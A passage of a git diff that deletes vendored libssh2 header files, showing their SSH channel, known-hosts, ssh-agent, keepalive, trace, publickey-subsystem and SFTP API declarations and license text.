-#define libssh2_channel_exec(channel, command) \
-  libssh2_channel_process_startup((channel), "exec", sizeof("exec") - 1, \
-                                  (command), (unsigned int)strlen(command))
-#define libssh2_channel_subsystem(channel, subsystem) \
-  libssh2_channel_process_startup((channel), "subsystem",              \
-                                  sizeof("subsystem") - 1, (subsystem), \
-                                  (unsigned int)strlen(subsystem))
-
-LIBSSH2_API ssize_t libssh2_channel_read_ex(LIBSSH2_CHANNEL *channel,
-                                            int stream_id, char *buf,
-                                            size_t buflen);
-#define libssh2_channel_read(channel, buf, buflen) \
-  libssh2_channel_read_ex((channel), 0, (buf), (buflen))
-#define libssh2_channel_read_stderr(channel, buf, buflen) \
-  libssh2_channel_read_ex((channel), SSH_EXTENDED_DATA_STDERR, (buf), (buflen))
-
-LIBSSH2_API int libssh2_poll_channel_read(LIBSSH2_CHANNEL *channel,
-                                          int extended);
-
-LIBSSH2_API unsigned long
-libssh2_channel_window_read_ex(LIBSSH2_CHANNEL *channel,
-                               unsigned long *read_avail,
-                               unsigned long *window_size_initial);
-#define libssh2_channel_window_read(channel) \
-  libssh2_channel_window_read_ex((channel), NULL, NULL)
-
-/* libssh2_channel_receive_window_adjust is DEPRECATED, do not use! */
-LIBSSH2_API unsigned long
-libssh2_channel_receive_window_adjust(LIBSSH2_CHANNEL *channel,
-                                      unsigned long adjustment,
-                                      unsigned char force);
-
-LIBSSH2_API int
-libssh2_channel_receive_window_adjust2(LIBSSH2_CHANNEL *channel,
-                                       unsigned long adjustment,
-                                       unsigned char force,
-                                       unsigned int *storewindow);
-
-LIBSSH2_API ssize_t libssh2_channel_write_ex(LIBSSH2_CHANNEL *channel,
-                                             int stream_id, const char *buf,
-                                             size_t buflen);
-
-#define libssh2_channel_write(channel, buf, buflen) \
-  libssh2_channel_write_ex((channel), 0, (buf), (buflen))
-#define libssh2_channel_write_stderr(channel, buf, buflen)  \
-  libssh2_channel_write_ex((channel), SSH_EXTENDED_DATA_STDERR, (buf), (buflen))
-
-LIBSSH2_API unsigned long
-libssh2_channel_window_write_ex(LIBSSH2_CHANNEL *channel,
-                                unsigned long *window_size_initial);
-#define libssh2_channel_window_write(channel) \
-  libssh2_channel_window_write_ex((channel), NULL)
-
-LIBSSH2_API void libssh2_session_set_blocking(LIBSSH2_SESSION* session,
-                                              int blocking);
-LIBSSH2_API int libssh2_session_get_blocking(LIBSSH2_SESSION* session);
-
-LIBSSH2_API void libssh2_channel_set_blocking(LIBSSH2_CHANNEL *channel,
-                                              int blocking);
-
-LIBSSH2_API void libssh2_session_set_timeout(LIBSSH2_SESSION* session,
-                                             long timeout);
-LIBSSH2_API long libssh2_session_get_timeout(LIBSSH2_SESSION* session);
-
-/* libssh2_channel_handle_extended_data is DEPRECATED, do not use! */
-LIBSSH2_API void libssh2_channel_handle_extended_data(LIBSSH2_CHANNEL *channel,
-                                                      int ignore_mode);
-LIBSSH2_API int libssh2_channel_handle_extended_data2(LIBSSH2_CHANNEL *channel,
-                                                      int ignore_mode);
-
-/* libssh2_channel_ignore_extended_data() is defined below for BC with version
- * 0.1
- *
- * Future uses should use libssh2_channel_handle_extended_data() directly if
- * LIBSSH2_CHANNEL_EXTENDED_DATA_MERGE is passed, extended data will be read
- * (FIFO) from the standard data channel
- */
-/* DEPRECATED */
-#define libssh2_channel_ignore_extended_data(channel, ignore) \
-  libssh2_channel_handle_extended_data((channel),                       \
-                                       (ignore) ?                       \
-                                       LIBSSH2_CHANNEL_EXTENDED_DATA_IGNORE : \
-                                       LIBSSH2_CHANNEL_EXTENDED_DATA_NORMAL )
-
-#define LIBSSH2_CHANNEL_FLUSH_EXTENDED_DATA     -1
-#define LIBSSH2_CHANNEL_FLUSH_ALL               -2
-LIBSSH2_API int libssh2_channel_flush_ex(LIBSSH2_CHANNEL *channel,
-                                         int streamid);
-#define libssh2_channel_flush(channel) libssh2_channel_flush_ex((channel), 0)
-#define libssh2_channel_flush_stderr(channel) \
- libssh2_channel_flush_ex((channel), SSH_EXTENDED_DATA_STDERR)
-
-LIBSSH2_API int libssh2_channel_get_exit_status(LIBSSH2_CHANNEL* channel);
-LIBSSH2_API int libssh2_channel_get_exit_signal(LIBSSH2_CHANNEL* channel,
-                                                char **exitsignal,
-                                                size_t *exitsignal_len,
-                                                char **errmsg,
-                                                size_t *errmsg_len,
-                                                char **langtag,
-                                                size_t *langtag_len);
-LIBSSH2_API int libssh2_channel_send_eof(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_eof(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_wait_eof(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_close(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_wait_closed(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_free(LIBSSH2_CHANNEL *channel);
-
-/* libssh2_scp_recv is DEPRECATED, do not use! */
-LIBSSH2_API LIBSSH2_CHANNEL *libssh2_scp_recv(LIBSSH2_SESSION *session,
-                                              const char *path,
-                                              struct stat *sb);
-/* Use libssh2_scp_recv2 for large (> 2GB) file support on windows */
-LIBSSH2_API LIBSSH2_CHANNEL *libssh2_scp_recv2(LIBSSH2_SESSION *session,
-                                               const char *path,
-                                               libssh2_struct_stat *sb);
-LIBSSH2_API LIBSSH2_CHANNEL *libssh2_scp_send_ex(LIBSSH2_SESSION *session,
-                                                 const char *path, int mode,
-                                                 size_t size, long mtime,
-                                                 long atime);
-LIBSSH2_API LIBSSH2_CHANNEL *
-libssh2_scp_send64(LIBSSH2_SESSION *session, const char *path, int mode,
-                   libssh2_int64_t size, time_t mtime, time_t atime);
-
-#define libssh2_scp_send(session, path, mode, size) \
-  libssh2_scp_send_ex((session), (path), (mode), (size), 0, 0)
-
-LIBSSH2_API int libssh2_base64_decode(LIBSSH2_SESSION *session, char **dest,
-                                      unsigned int *dest_len,
-                                      const char *src, unsigned int src_len);
-
-LIBSSH2_API
-const char *libssh2_version(int req_version_num);
-
-#define HAVE_LIBSSH2_KNOWNHOST_API 0x010101 /* since 1.1.1 */
-#define HAVE_LIBSSH2_VERSION_API   0x010100 /* libssh2_version since 1.1 */
-
-struct libssh2_knownhost {
-    unsigned int magic;  /* magic stored by the library */
-    void *node; /* handle to the internal representation of this host */
-    char *name; /* this is NULL if no plain text host name exists */
-    char *key;  /* key in base64/printable format */
-    int typemask;
-};
-
-/*
- * libssh2_knownhost_init
- *
- * Init a collection of known hosts. Returns the pointer to a collection.
- *
- */
-LIBSSH2_API LIBSSH2_KNOWNHOSTS *
-libssh2_knownhost_init(LIBSSH2_SESSION *session);
-
-/*
- * libssh2_knownhost_add
- *
- * Add a host and its associated key to the collection of known hosts.
- *
- * The 'type' argument specifies on what format the given host and keys are:
- *
- * plain  - ascii "hostname.domain.tld"
- * sha1   - SHA1(<salt> <host>) base64-encoded!
- * custom - another hash
- *
- * If 'sha1' is selected as type, the salt must be provided to the salt
- * argument. This too base64 encoded.
- *
- * The SHA-1 hash is what OpenSSH can be told to use in known_hosts files.  If
- * a custom type is used, salt is ignored and you must provide the host
- * pre-hashed when checking for it in the libssh2_knownhost_check() function.
- *
- * The keylen parameter may be omitted (zero) if the key is provided as a
- * NULL-terminated base64-encoded string.
- */
-
-/* host format (2 bits) */
-#define LIBSSH2_KNOWNHOST_TYPE_MASK    0xffff
-#define LIBSSH2_KNOWNHOST_TYPE_PLAIN   1
-#define LIBSSH2_KNOWNHOST_TYPE_SHA1    2 /* always base64 encoded */
-#define LIBSSH2_KNOWNHOST_TYPE_CUSTOM  3
-
-/* key format (2 bits) */
-#define LIBSSH2_KNOWNHOST_KEYENC_MASK     (3<<16)
-#define LIBSSH2_KNOWNHOST_KEYENC_RAW      (1<<16)
-#define LIBSSH2_KNOWNHOST_KEYENC_BASE64   (2<<16)
-
-/* type of key (2 bits) */
-#define LIBSSH2_KNOWNHOST_KEY_MASK     (7<<18)
-#define LIBSSH2_KNOWNHOST_KEY_SHIFT    18
-#define LIBSSH2_KNOWNHOST_KEY_RSA1     (1<<18)
-#define LIBSSH2_KNOWNHOST_KEY_SSHRSA   (2<<18)
-#define LIBSSH2_KNOWNHOST_KEY_SSHDSS   (3<<18)
-#define LIBSSH2_KNOWNHOST_KEY_UNKNOWN  (7<<18)
-
-LIBSSH2_API int
-libssh2_knownhost_add(LIBSSH2_KNOWNHOSTS *hosts,
-                      const char *host,
-                      const char *salt,
-                      const char *key, size_t keylen, int typemask,
-                      struct libssh2_knownhost **store);
-
-/*
- * libssh2_knownhost_addc
- *
- * Add a host and its associated key to the collection of known hosts.
- *
- * Takes a comment argument that may be NULL.  A NULL comment indicates
- * there is no comment and the entry will end directly after the key
- * when written out to a file.  An empty string "" comment will indicate an
- * empty comment which will cause a single space to be written after the key.
- *
- * The 'type' argument specifies on what format the given host and keys are:
- *
- * plain  - ascii "hostname.domain.tld"
- * sha1   - SHA1(<salt> <host>) base64-encoded!
- * custom - another hash
- *
- * If 'sha1' is selected as type, the salt must be provided to the salt
- * argument. This too base64 encoded.
- *
- * The SHA-1 hash is what OpenSSH can be told to use in known_hosts files.  If
- * a custom type is used, salt is ignored and you must provide the host
- * pre-hashed when checking for it in the libssh2_knownhost_check() function.
- *
- * The keylen parameter may be omitted (zero) if the key is provided as a
- * NULL-terminated base64-encoded string.
- */
-
-LIBSSH2_API int
-libssh2_knownhost_addc(LIBSSH2_KNOWNHOSTS *hosts,
-                       const char *host,
-                       const char *salt,
-                       const char *key, size_t keylen,
-                       const char *comment, size_t commentlen, int typemask,
-                       struct libssh2_knownhost **store);
-
-/*
- * libssh2_knownhost_check
- *
- * Check a host and its associated key against the collection of known hosts.
- *
- * The type is the type/format of the given host name.
- *
- * plain  - ascii "hostname.domain.tld"
- * custom - prehashed base64 encoded. Note that this cannot use any salts.
- *
- *
- * 'knownhost' may be set to NULL if you don't care about that info.
- *
- * Returns:
- *
- * LIBSSH2_KNOWNHOST_CHECK_* values, see below
- *
- */
-
-#define LIBSSH2_KNOWNHOST_CHECK_MATCH    0
-#define LIBSSH2_KNOWNHOST_CHECK_MISMATCH 1
-#define LIBSSH2_KNOWNHOST_CHECK_NOTFOUND 2
-#define LIBSSH2_KNOWNHOST_CHECK_FAILURE  3
-
-LIBSSH2_API int
-libssh2_knownhost_check(LIBSSH2_KNOWNHOSTS *hosts,
-                        const char *host, const char *key, size_t keylen,
-                        int typemask,
-                        struct libssh2_knownhost **knownhost);
-
-/* this function is identital to the above one, but also takes a port
-   argument that allows libssh2 to do a better check */
-LIBSSH2_API int
-libssh2_knownhost_checkp(LIBSSH2_KNOWNHOSTS *hosts,
-                         const char *host, int port,
-                         const char *key, size_t keylen,
-                         int typemask,
-                         struct libssh2_knownhost **knownhost);
-
-/*
- * libssh2_knownhost_del
- *
- * Remove a host from the collection of known hosts. The 'entry' struct is
- * retrieved by a call to libssh2_knownhost_check().
- *
- */
-LIBSSH2_API int
-libssh2_knownhost_del(LIBSSH2_KNOWNHOSTS *hosts,
-                      struct libssh2_knownhost *entry);
-
-/*
- * libssh2_knownhost_free
- *
- * Free an entire collection of known hosts.
- *
- */
-LIBSSH2_API void
-libssh2_knownhost_free(LIBSSH2_KNOWNHOSTS *hosts);
-
-/*
- * libssh2_knownhost_readline()
- *
- * Pass in a line of a file of 'type'. It makes libssh2 read this line.
- *
- * LIBSSH2_KNOWNHOST_FILE_OPENSSH is the only supported type.
- *
- */
-LIBSSH2_API int
-libssh2_knownhost_readline(LIBSSH2_KNOWNHOSTS *hosts,
-                           const char *line, size_t len, int type);
-
-/*
- * libssh2_knownhost_readfile
- *
- * Add hosts+key pairs from a given file.
- *
- * Returns a negative value for error or number of successfully added hosts.
- *
- * This implementation currently only knows one 'type' (openssh), all others
- * are reserved for future use.
- */
-
-#define LIBSSH2_KNOWNHOST_FILE_OPENSSH 1
-
-LIBSSH2_API int
-libssh2_knownhost_readfile(LIBSSH2_KNOWNHOSTS *hosts,
-                           const char *filename, int type);
-
-/*
- * libssh2_knownhost_writeline()
- *
- * Ask libssh2 to convert a known host to an output line for storage.
- *
- * Note that this function returns LIBSSH2_ERROR_BUFFER_TOO_SMALL if the given
- * output buffer is too small to hold the desired output.
- *
- * This implementation currently only knows one 'type' (openssh), all others
- * are reserved for future use.
- *
- */
-LIBSSH2_API int
-libssh2_knownhost_writeline(LIBSSH2_KNOWNHOSTS *hosts,
-                            struct libssh2_knownhost *known,
-                            char *buffer, size_t buflen,
-                            size_t *outlen, /* the amount of written data */
-                            int type);
-
-/*
- * libssh2_knownhost_writefile
- *
- * Write hosts+key pairs to a given file.
- *
- * This implementation currently only knows one 'type' (openssh), all others
- * are reserved for future use.
- */
-
-LIBSSH2_API int
-libssh2_knownhost_writefile(LIBSSH2_KNOWNHOSTS *hosts,
-                            const char *filename, int type);
-
-/*
- * libssh2_knownhost_get()
- *
- * Traverse the internal list of known hosts. Pass NULL to 'prev' to get
- * the first one. Or pass a poiner to the previously returned one to get the
- * next.
- *
- * Returns:
- * 0 if a fine host was stored in 'store'
- * 1 if end of hosts
- * [negative] on errors
- */
-LIBSSH2_API int
-libssh2_knownhost_get(LIBSSH2_KNOWNHOSTS *hosts,
-                      struct libssh2_knownhost **store,
-                      struct libssh2_knownhost *prev);
-
-#define HAVE_LIBSSH2_AGENT_API 0x010202 /* since 1.2.2 */
-
-struct libssh2_agent_publickey {
-    unsigned int magic;              /* magic stored by the library */
-    void *node;     /* handle to the internal representation of key */
-    unsigned char *blob;           /* public key blob */
-    size_t blob_len;               /* length of the public key blob */
-    char *comment;                 /* comment in printable format */
-};
-
-/*
- * libssh2_agent_init
- *
- * Init an ssh-agent handle. Returns the pointer to the handle.
- *
- */
-LIBSSH2_API LIBSSH2_AGENT *
-libssh2_agent_init(LIBSSH2_SESSION *session);
-
-/*
- * libssh2_agent_connect()
- *
- * Connect to an ssh-agent.
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int
-libssh2_agent_connect(LIBSSH2_AGENT *agent);
-
-/*
- * libssh2_agent_list_identities()
- *
- * Request an ssh-agent to list identities.
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int
-libssh2_agent_list_identities(LIBSSH2_AGENT *agent);
-
-/*
- * libssh2_agent_get_identity()
- *
- * Traverse the internal list of public keys. Pass NULL to 'prev' to get
- * the first one. Or pass a poiner to the previously returned one to get the
- * next.
- *
- * Returns:
- * 0 if a fine public key was stored in 'store'
- * 1 if end of public keys
- * [negative] on errors
- */
-LIBSSH2_API int
-libssh2_agent_get_identity(LIBSSH2_AGENT *agent,
-               struct libssh2_agent_publickey **store,
-               struct libssh2_agent_publickey *prev);
-
-/*
- * libssh2_agent_userauth()
- *
- * Do publickey user authentication with the help of ssh-agent.
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int
-libssh2_agent_userauth(LIBSSH2_AGENT *agent,
-               const char *username,
-               struct libssh2_agent_publickey *identity);
-
-/*
- * libssh2_agent_disconnect()
- *
- * Close a connection to an ssh-agent.
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int
-libssh2_agent_disconnect(LIBSSH2_AGENT *agent);
-
-/*
- * libssh2_agent_free()
- *
- * Free an ssh-agent handle.  This function also frees the internal
- * collection of public keys.
- */
-LIBSSH2_API void
-libssh2_agent_free(LIBSSH2_AGENT *agent);
-
-
-/*
- * libssh2_keepalive_config()
- *
- * Set how often keepalive messages should be sent.  WANT_REPLY
- * indicates whether the keepalive messages should request a response
- * from the server.  INTERVAL is number of seconds that can pass
- * without any I/O, use 0 (the default) to disable keepalives.  To
- * avoid some busy-loop corner-cases, if you specify an interval of 1
- * it will be treated as 2.
- *
- * Note that non-blocking applications are responsible for sending the
- * keepalive messages using libssh2_keepalive_send().
- */
-LIBSSH2_API void libssh2_keepalive_config (LIBSSH2_SESSION *session,
-                                           int want_reply,
-                                           unsigned interval);
-
-/*
- * libssh2_keepalive_send()
- *
- * Send a keepalive message if needed.  SECONDS_TO_NEXT indicates how
- * many seconds you can sleep after this call before you need to call
- * it again.  Returns 0 on success, or LIBSSH2_ERROR_SOCKET_SEND on
- * I/O errors.
- */
-LIBSSH2_API int libssh2_keepalive_send (LIBSSH2_SESSION *session,
-                                        int *seconds_to_next);
-
-/* NOTE NOTE NOTE
-   libssh2_trace() has no function in builds that aren't built with debug
-   enabled
- */
-LIBSSH2_API int libssh2_trace(LIBSSH2_SESSION *session, int bitmask);
-#define LIBSSH2_TRACE_TRANS (1<<1)
-#define LIBSSH2_TRACE_KEX   (1<<2)
-#define LIBSSH2_TRACE_AUTH  (1<<3)
-#define LIBSSH2_TRACE_CONN  (1<<4)
-#define LIBSSH2_TRACE_SCP   (1<<5)
-#define LIBSSH2_TRACE_SFTP  (1<<6)
-#define LIBSSH2_TRACE_ERROR (1<<7)
-#define LIBSSH2_TRACE_PUBLICKEY (1<<8)
-#define LIBSSH2_TRACE_SOCKET (1<<9)
-
-typedef void (*libssh2_trace_handler_func)(LIBSSH2_SESSION*,
-                                           void*,
-                                           const char *,
-                                           size_t);
-LIBSSH2_API int libssh2_trace_sethandler(LIBSSH2_SESSION *session,
-                                         void* context,
-                                         libssh2_trace_handler_func callback);
-
-#ifdef __cplusplus
-} /* extern "C" */
-#endif
-
-#endif /* !RC_INVOKED */
-
-#endif /* LIBSSH2_H */
diff --git a/thirdparty/libssh2/include/libssh2_publickey.h b/thirdparty/libssh2/include/libssh2_publickey.h
deleted file mode 100644
index 0979e23..0000000
--- a/thirdparty/libssh2/include/libssh2_publickey.h
+++ /dev/null
@@ -1,119 +0,0 @@
-/* Copyright (c) 2004-2006, Sara Golemon <sarag@libssh2.org>
- * All rights reserved.
- *
- * Redistribution and use in source and binary forms,
- * with or without modification, are permitted provided
- * that the following conditions are met:
- *
- *   Redistributions of source code must retain the above
- *   copyright notice, this list of conditions and the
- *   following disclaimer.
- *
- *   Redistributions in binary form must reproduce the above
- *   copyright notice, this list of conditions and the following
- *   disclaimer in the documentation and/or other materials
- *   provided with the distribution.
- *
- *   Neither the name of the copyright holder nor the names
- *   of any other contributors may be used to endorse or
- *   promote products derived from this software without
- *   specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
- * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
- * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
- * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
- * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
- * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
- * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
- * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
- * OF SUCH DAMAGE.
- */
-
-/* Note: This include file is only needed for using the
- * publickey SUBSYSTEM which is not the same as publickey
- * authentication.  For authentication you only need libssh2.h
- *
- * For more information on the publickey subsystem,
- * refer to IETF draft: secsh-publickey
- */
-
-#ifndef LIBSSH2_PUBLICKEY_H
-#define LIBSSH2_PUBLICKEY_H 1
-
-#include "libssh2.h"
-
-typedef struct _LIBSSH2_PUBLICKEY               LIBSSH2_PUBLICKEY;
-
-typedef struct _libssh2_publickey_attribute {
-    const char *name;
-    unsigned long name_len;
-    const char *value;
-    unsigned long value_len;
-    char mandatory;
-} libssh2_publickey_attribute;
-
-typedef struct _libssh2_publickey_list {
-    unsigned char *packet; /* For freeing */
-
-    const unsigned char *name;
-    unsigned long name_len;
-    const unsigned char *blob;
-    unsigned long blob_len;
-    unsigned long num_attrs;
-    libssh2_publickey_attribute *attrs; /* free me */
-} libssh2_publickey_list;
-
-/* Generally use the first macro here, but if both name and value are string
-   literals, you can use _fast() to take advantage of preprocessing */
-#define libssh2_publickey_attribute(name, value, mandatory) \
-  { (name), strlen(name), (value), strlen(value), (mandatory) },
-#define libssh2_publickey_attribute_fast(name, value, mandatory) \
-  { (name), sizeof(name) - 1, (value), sizeof(value) - 1, (mandatory) },
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* Publickey Subsystem */
-LIBSSH2_API LIBSSH2_PUBLICKEY *libssh2_publickey_init(LIBSSH2_SESSION *session);
-
-LIBSSH2_API int libssh2_publickey_add_ex(LIBSSH2_PUBLICKEY *pkey,
-                                         const unsigned char *name,
-                                         unsigned long name_len,
-                                         const unsigned char *blob,
-                                         unsigned long blob_len, char overwrite,
-                                         unsigned long num_attrs,
-                                         const libssh2_publickey_attribute attrs[]);
-#define libssh2_publickey_add(pkey, name, blob, blob_len, overwrite, \
-                              num_attrs, attrs)                         \
-  libssh2_publickey_add_ex((pkey), (name), strlen(name), (blob), (blob_len), \
-                           (overwrite), (num_attrs), (attrs))
-
-LIBSSH2_API int libssh2_publickey_remove_ex(LIBSSH2_PUBLICKEY *pkey,
-                                            const unsigned char *name,
-                                            unsigned long name_len,
-                                            const unsigned char *blob,
-                                            unsigned long blob_len);
-#define libssh2_publickey_remove(pkey, name, blob, blob_len) \
-  libssh2_publickey_remove_ex((pkey), (name), strlen(name), (blob), (blob_len))
-
-LIBSSH2_API int
-libssh2_publickey_list_fetch(LIBSSH2_PUBLICKEY *pkey,
-                             unsigned long *num_keys,
-                             libssh2_publickey_list **pkey_list);
-LIBSSH2_API void libssh2_publickey_list_free(LIBSSH2_PUBLICKEY *pkey,
-                                             libssh2_publickey_list *pkey_list);
-
-LIBSSH2_API int libssh2_publickey_shutdown(LIBSSH2_PUBLICKEY *pkey);
-
-#ifdef __cplusplus
-} /* extern "C" */
-#endif
-
-#endif /* ifndef: LIBSSH2_PUBLICKEY_H */
diff --git a/thirdparty/libssh2/include/libssh2_sftp.h b/thirdparty/libssh2/include/libssh2_sftp.h
deleted file mode 100644
index 677faf2..0000000
--- a/thirdparty/libssh2/include/libssh2_sftp.h
+++ /dev/null
@@ -1,346 +0,0 @@
-/* Copyright (c) 2004-2008, Sara Golemon <sarag@libssh2.org>
- * All rights reserved.
- *
- * Redistribution and use in source and binary forms,
- * with or without modification, are permitted provided
- * that the following conditions are met:
- *
- *   Redistributions of source code must retain the above
- *   copyright notice, this list of conditions and the
- *   following disclaimer.
- *
- *   Redistributions in binary form must reproduce the above
- *   copyright notice, this list of conditions and the following
- *   disclaimer in the documentation and/or other materials
- *   provided with the distribution.
- *
- *   Neither the name of the copyright holder nor the names
- *   of any other contributors may be used to endorse or
- *   promote products derived from this software without
- *   specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
- * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
- * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
- * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
- * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
- * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
- * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
- * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
- * OF SUCH DAMAGE.
- */
-
-#ifndef LIBSSH2_SFTP_H
-#define LIBSSH2_SFTP_H 1
-
-#include "libssh2.h"
-
-#ifndef WIN32
-#include <unistd.h>
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* Note: Version 6 was documented at the time of writing
- * However it was marked as "DO NOT IMPLEMENT" due to pending changes
- *
- * Let's start with Version 3 (The version found in OpenSSH) and go from there
- */
-#define LIBSSH2_SFTP_VERSION        3
-
-typedef struct _LIBSSH2_SFTP                LIBSSH2_SFTP;
-typedef struct _LIBSSH2_SFTP_HANDLE         LIBSSH2_SFTP_HANDLE;
-typedef struct _LIBSSH2_SFTP_ATTRIBUTES     LIBSSH2_SFTP_ATTRIBUTES;
-typedef struct _LIBSSH2_SFTP_STATVFS        LIBSSH2_SFTP_STATVFS;
-
-/* Flags for open_ex() */
-#define LIBSSH2_SFTP_OPENFILE           0
-#define LIBSSH2_SFTP_OPENDIR            1
-
-/* Flags for rename_ex() */
-#define LIBSSH2_SFTP_RENAME_OVERWRITE   0x00000001
-#define LIBSSH2_SFTP_RENAME_ATOMIC      0x00000002
-#define LIBSSH2_SFTP_RENAME_NATIVE      0x00000004
-
-/* Flags for stat_ex() */
-#define LIBSSH2_SFTP_STAT               0
-#define LIBSSH2_SFTP_LSTAT              1
-#define LIBSSH2_SFTP_SETSTAT            2
-
-/* Flags for symlink_ex() */
-#define LIBSSH2_SFTP_SYMLINK            0
-#define LIBSSH2_SFTP_READLINK           1
-#define LIBSSH2_SFTP_REALPATH           2
-
-/* SFTP attribute flag bits */
-#define LIBSSH2_SFTP_ATTR_SIZE              0x00000001
-#define LIBSSH2_SFTP_ATTR_UIDGID            0x00000002
-#define LIBSSH2_SFTP_ATTR_PERMISSIONS       0x00000004
-#define LIBSSH2_SFTP_ATTR_ACMODTIME         0x00000008
-#define LIBSSH2_SFTP_ATTR_EXTENDED          0x80000000
-
-/* SFTP statvfs flag bits */
-#define LIBSSH2_SFTP_ST_RDONLY              0x00000001
-#define LIBSSH2_SFTP_ST_NOSUID              0x00000002
-
-struct _LIBSSH2_SFTP_ATTRIBUTES {
-    /* If flags & ATTR_* bit is set, then the value in this struct will be
-     * meaningful Otherwise it should be ignored
-     */
-    unsigned long flags;
-
-    libssh2_uint64_t filesize;
-    unsigned long uid, gid;
-    unsigned long permissions;
-    unsigned long atime, mtime;
-};
-
-struct _LIBSSH2_SFTP_STATVFS {
-    libssh2_uint64_t  f_bsize;    /* file system block size */
-    libssh2_uint64_t  f_frsize;   /* fragment size */
-    libssh2_uint64_t  f_blocks;   /* size of fs in f_frsize units */
-    libssh2_uint64_t  f_bfree;    /* # free blocks */
-    libssh2_uint64_t  f_bavail;   /* # free blocks for non-root */
-    libssh2_uint64_t  f_files;    /* # inodes */
-    libssh2_uint64_t  f_ffree;    /* # free inodes */
-    libssh2_uint64_t  f_favail;   /* # free inodes for non-root */
-    libssh2_uint64_t  f_fsid;     /* file system ID */
-    libssh2_uint64_t  f_flag;     /* mount flags */
-    libssh2_uint64_t  f_namemax;  /* maximum filename length */
-};
-
-/* SFTP filetypes */
-#define LIBSSH2_SFTP_TYPE_REGULAR           1
-#define LIBSSH2_SFTP_TYPE_DIRECTORY         2
-#define LIBSSH2_SFTP_TYPE_SYMLINK           3
-#define LIBSSH2_SFTP_TYPE_SPECIAL           4
-#define LIBSSH2_SFTP_TYPE_UNKNOWN           5
-#define LIBSSH2_SFTP_TYPE_SOCKET            6
-#define LIBSSH2_SFTP_TYPE_CHAR_DEVICE       7
-#define LIBSSH2_SFTP_TYPE_BLOCK_DEVICE      8
-#define LIBSSH2_SFTP_TYPE_FIFO              9
-
-/*
- * Reproduce the POSIX file modes here for systems that are not POSIX
- * compliant.
- *
- * These is used in "permissions" of "struct _LIBSSH2_SFTP_ATTRIBUTES"
- */
-/* File type */
-#define LIBSSH2_SFTP_S_IFMT         0170000     /* type of file mask */
-#define LIBSSH2_SFTP_S_IFIFO        0010000     /* named pipe (fifo) */
-#define LIBSSH2_SFTP_S_IFCHR        0020000     /* character special */
-#define LIBSSH2_SFTP_S_IFDIR        0040000     /* directory */
-#define LIBSSH2_SFTP_S_IFBLK        0060000     /* block special */
-#define LIBSSH2_SFTP_S_IFREG        0100000     /* regular */
-#define LIBSSH2_SFTP_S_IFLNK        0120000     /* symbolic link */
-#define LIBSSH2_SFTP_S_IFSOCK       0140000     /* socket */
-
-/* File mode */
-/* Read, write, execute/search by owner */
-#define LIBSSH2_SFTP_S_IRWXU        0000700     /* RWX mask for owner */
-#define LIBSSH2_SFTP_S_IRUSR        0000400     /* R for owner */
-#define LIBSSH2_SFTP_S_IWUSR        0000200     /* W for owner */
-#define LIBSSH2_SFTP_S_IXUSR        0000100     /* X for owner */
-/* Read, write, execute/search by group */
-#define LIBSSH2_SFTP_S_IRWXG        0000070     /* RWX mask for group */
-#define LIBSSH2_SFTP_S_IRGRP        0000040     /* R for group */
-#define LIBSSH2_SFTP_S_IWGRP        0000020     /* W for group */
-#define LIBSSH2_SFTP_S_IXGRP        0000010     /* X for group */
-/* Read, write, execute/search by others */
-#define LIBSSH2_SFTP_S_IRWXO        0000007     /* RWX mask for other */
-#define LIBSSH2_SFTP_S_IROTH        0000004     /* R for other */
-#define LIBSSH2_SFTP_S_IWOTH        0000002     /* W for other */
-#define LIBSSH2_SFTP_S_IXOTH        0000001     /* X for other */
-
-/* macros to check for specific file types, added in 1.2.5 */
-#define LIBSSH2_SFTP_S_ISLNK(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFLNK)
